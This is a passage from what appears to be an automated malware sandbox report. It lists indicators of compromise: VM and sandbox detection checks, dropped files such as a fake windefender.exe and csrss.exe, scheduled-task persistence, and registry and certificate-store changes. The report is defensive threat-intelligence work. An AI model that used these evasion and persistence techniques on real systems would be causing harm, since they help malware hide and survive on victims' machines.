Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
tboJHJHII9Q9oJjVSOI6pAdI.exewPomemXLiK3rq2QEvqS91crJ.exe0Nhea7WWQs8EX8ArZhcVpAHV.exeN6wB3wEBbCcQjlZT4NZcejMm.exeq0SJhh1BDxoYxBBlQAP6orRh.exel5KWUH4RxMkj5MD26qD7ur2C.exedescription ioc process File opened (read-only) \??\VBoxMiniRdrDN tboJHJHII9Q9oJjVSOI6pAdI.exe File opened (read-only) \??\VBoxMiniRdrDN wPomemXLiK3rq2QEvqS91crJ.exe File opened (read-only) \??\VBoxMiniRdrDN 0Nhea7WWQs8EX8ArZhcVpAHV.exe File opened (read-only) \??\VBoxMiniRdrDN N6wB3wEBbCcQjlZT4NZcejMm.exe File opened (read-only) \??\VBoxMiniRdrDN q0SJhh1BDxoYxBBlQAP6orRh.exe File opened (read-only) \??\VBoxMiniRdrDN l5KWUH4RxMkj5MD26qD7ur2C.exe -
Drops file in Program Files directory 64 IoCs
Processes:
install.exevJkRBwz.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeXAafaZk.exeCCtCNtF.exedescription ioc process File opened for modification C:\Program Files (x86)\GameServerClient\GameServerClient.exe install.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi vJkRBwz.exe File created C:\Program Files (x86)\RVqmAwyyxwiU2\YgbXKPO.xml vJkRBwz.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\System.ValueTuple.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\it\ACResources.resources.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\InstallDriver.bat SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\System.Runtime.CompilerServices.Unsafe.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\GvrMgr.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi XAafaZk.exe File created C:\Program Files (x86)\RVqmAwyyxwiU2\RjSrtnaUEEZsX.dll vJkRBwz.exe File created C:\Program Files (x86)\DUGaRsFaSnqjC\MKqvVHY.xml XAafaZk.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\Microsoft.Web.WebView2.Wpf.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\System.Net.Http.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\NLog.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\ioloTrayApp.exe.config SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\Microsoft.Diagnostics.FastSerialization.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\btscan.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File created C:\Program Files (x86)\jDcnSjPvYahU2\UgfLSRKWmYrkV.dll CCtCNtF.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\Incinerator.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\PDFsFilter.inf SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\WPF_Driver\driver\wfp\windows10\std\i386\pgfilter.sys SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\WPF_Driver\install_wfp_driver_windows8_x64.bat SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\Incinerator.exe SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\UninstallDriver.bat SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\SmartPlug.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\msalruntime.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\PrivacyGuardian.ico SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\SearchAndRecover.ico SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\Microsoft.Identity.Client.NativeInterop.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\WPF_Driver\driver\tdi\wpp\amd64\netfilter2.sys SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\WPF_Driver\uninstall_driver.bat SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\portscan.exe SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi CCtCNtF.exe File created C:\Program Files (x86)\jDcnSjPvYahU2\SkXhWKo.xml CCtCNtF.exe File created C:\Program Files (x86)\ARTXeDTAxvUn\XfeNiyp.dll XAafaZk.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\ACResources.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\Microsoft.Practices.Prism.Interactivity.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\ToolKit.Interop.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File created C:\Program Files (x86)\GameServerClient\installg.bat install.exe File created C:\Program Files (x86)\DUGaRsFaSnqjC\wcSbRBe.dll vJkRBwz.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\fr\ACResources.resources.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\WPF_Driver\install_wfp_driver_windows7_x64.bat SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\SMInfrastructure.dll.config SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak CCtCNtF.exe File created C:\Program Files (x86)\ByWuwrOBU\eAdolTj.xml vJkRBwz.exe File created C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\yjaGLPX.dll vJkRBwz.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\SMInfrastructure.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\ioloIcon.ico SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File created C:\Program Files (x86)\GameServerClient\installc.bat install.exe File created C:\Program Files (x86)\GameServerClient\GameService.exe install.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi vJkRBwz.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\Microsoft.Win32.TaskScheduler.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\ja\ACResources.resources.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\WPF_Driver\driver\tdi\wpp\i386\netfilter2.sys SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files (x86)\GameServerClient\installc.bat install.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\WSC.exe.config SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\System.Windows.Interactivity.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\netscan.dll.config SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\Microsoft.Identity.Client.Broker.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\SystemShield.ico SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\nl\ACResources.resources.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\WPF_Driver\install_wfp_driver_windows8.bat SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\WPF_Driver\release\win32\nfapi.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened for modification C:\Program Files\iolo technologies\System Mechanic\ProtocolFilters.dll SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe -
Drops file in Windows directory 34 IoCs
Processes:
MicrosoftEdgeCP.exejjuuAXZz7uWvEL2tOnUS.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeschtasks.exeMicrosoftEdge.exeschtasks.exeschtasks.exetaskmgr.exeMicrosoftEdgeCP.exeamert.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.execsrss.exeMicrosoftEdgeCP.exetboJHJHII9Q9oJjVSOI6pAdI.exeschtasks.exeschtasks.exeMicrosoftEdgeCP.exeschtasks.exeMicrosoftEdgeCP.exeschtasks.exeschtasks.exeschtasks.exeMicrosoftEdgeCP.exeschtasks.exeMicrosoftEdgeCP.exedescription ioc process File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe File created C:\Windows\Tasks\explorta.job jjuuAXZz7uWvEL2tOnUS.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe File created C:\Windows\Tasks\BAnwxolbGpCzXNxkj.job schtasks.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Tasks\bWycNackLSywaqkmgR.job schtasks.exe File created C:\Windows\Tasks\bWycNackLSywaqkmgR.job schtasks.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\4183903823\2290032291.pri taskmgr.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe File created C:\Windows\Tasks\chrosha.job amert.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe File created C:\Windows\rss\csrss.exe tboJHJHII9Q9oJjVSOI6pAdI.exe File created C:\Windows\Tasks\ZPVskaMeORyUtyn.job schtasks.exe File created C:\Windows\Tasks\EJKQCvUwFyvoZzoaf.job schtasks.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Tasks\BAnwxolbGpCzXNxkj.job schtasks.exe File created C:\Windows\rescache\_merged\1601268389\715946058.pri taskmgr.exe File opened for modification C:\Windows\rss tboJHJHII9Q9oJjVSOI6pAdI.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri taskmgr.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Tasks\qbSDwEgyNYPZlGA.job schtasks.exe File created C:\Windows\Tasks\bwrroZoeZRoQVpyAcj.job schtasks.exe File created C:\Windows\Tasks\qXnxKrbPbFSTFetyh.job schtasks.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe File created C:\Windows\Tasks\qbSDwEgyNYPZlGA.job schtasks.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe -
Launches sc.exe 12 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1532 sc.exe 7540 sc.exe 5528 sc.exe 8856 sc.exe 3936 sc.exe 2208 sc.exe 5092 sc.exe 5396 sc.exe 7428 sc.exe 4524 sc.exe 5312 sc.exe 5404 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 9 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2752 2708 WerFault.exe luhXBiuEvI6m3KxAsSfTpgok.exe 4540 4756 WerFault.exe zlbyhhvqluAa2YWd57tl7eT_.exe 4656 2540 WerFault.exe RegAsm.exe 7040 5288 WerFault.exe swiiiii.exe 5512 5668 WerFault.exe alexxxxxxxx.exe 6512 3008 WerFault.exe gold.exe 1720 5308 WerFault.exe x8czyfkmmCzRCnptPtoRIMT4.exe 6380 6508 WerFault.exe cNfT86s447KaBzQurj9awdEl.exe 8092 7456 WerFault.exe RegAsm.exe -
Checks SCSI registry key(s) 3 TTPs 24 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
ioloTrayApp.exetaskmgr.exeu5to.3.exeincinerator.exeiolo.exeioloTrayApp.exeactivebridge.exeu60s.3.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ioloTrayApp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u5to.3.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI incinerator.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iolo.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ioloTrayApp.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ioloTrayApp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ioloTrayApp.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u5to.3.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u5to.3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI incinerator.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI incinerator.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iolo.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iolo.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI activebridge.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ioloTrayApp.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ioloTrayApp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u60s.3.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u60s.3.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u60s.3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI activebridge.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI activebridge.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RegAsm.exeHeIaw9JVr_srPOb759oFOk3h.exeYeIXGSxWKaTAiDgamD7WXkA9.exeAnDuBYZ639CmLSQ8NUtablTR.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 HeIaw9JVr_srPOb759oFOk3h.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString HeIaw9JVr_srPOb759oFOk3h.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 YeIXGSxWKaTAiDgamD7WXkA9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString YeIXGSxWKaTAiDgamD7WXkA9.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AnDuBYZ639CmLSQ8NUtablTR.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AnDuBYZ639CmLSQ8NUtablTR.exe -
Creates scheduled task(s) 1 TTPs 45 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2696 schtasks.exe 7492 schtasks.exe 7656 schtasks.exe 9152 schtasks.exe 7364 schtasks.exe 2512 schtasks.exe 6124 schtasks.exe 6116 schtasks.exe 6316 schtasks.exe 9092 schtasks.exe 5296 schtasks.exe 764 schtasks.exe 8464 schtasks.exe 3468 schtasks.exe 4216 schtasks.exe 4208 schtasks.exe 3728 schtasks.exe 6064 schtasks.exe 1880 schtasks.exe 2628 schtasks.exe 1428 schtasks.exe 4344 schtasks.exe 2104 schtasks.exe 5336 schtasks.exe 60 schtasks.exe 2600 schtasks.exe 6452 schtasks.exe 2512 schtasks.exe 6404 schtasks.exe 3428 schtasks.exe 756 schtasks.exe 2792 schtasks.exe 1880 schtasks.exe 6740 schtasks.exe 1600 schtasks.exe 4524 schtasks.exe 3736 schtasks.exe 2728 schtasks.exe 7512 schtasks.exe 8264 schtasks.exe 8568 schtasks.exe 7516 schtasks.exe 3980 schtasks.exe 3220 schtasks.exe 3804 schtasks.exe -
Enumerates system info in registry 2 TTPs 14 IoCs
Processes:
rundll32.exechrome.exeInstall.exeInstall.exechrome.exeInstall.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
GoLang User-Agent 8 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 1417 Go-http-client/1.1 HTTP User-Agent header 1418 Go-http-client/1.1 HTTP User-Agent header 2562 Go-http-client/1.1 HTTP User-Agent header 2609 Go-http-client/1.1 HTTP User-Agent header 7390 Go-http-client/1.1 HTTP User-Agent header 7465 Go-http-client/1.1 HTTP User-Agent header 748 Go-http-client/1.1 HTTP User-Agent header 749 Go-http-client/1.1 -
Processes:
MicrosoftEdgeCP.exeiolo.exebrowser_broker.exebrowser_broker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iolo.exe = "11001" iolo.exe Set value (int) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iolo.exe = "11001" iolo.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exewindefender.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetboJHJHII9Q9oJjVSOI6pAdI.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeXAafaZk.exepowershell.exeCCtCNtF.exepowershell.exenetsh.exepowershell.exevJkRBwz.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-252 = "Dateline Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" tboJHJHII9Q9oJjVSOI6pAdI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" tboJHJHII9Q9oJjVSOI6pAdI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ XAafaZk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing CCtCNtF.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" tboJHJHII9Q9oJjVSOI6pAdI.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" tboJHJHII9Q9oJjVSOI6pAdI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" tboJHJHII9Q9oJjVSOI6pAdI.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2841 = "Saratov Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" tboJHJHII9Q9oJjVSOI6pAdI.exe Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight 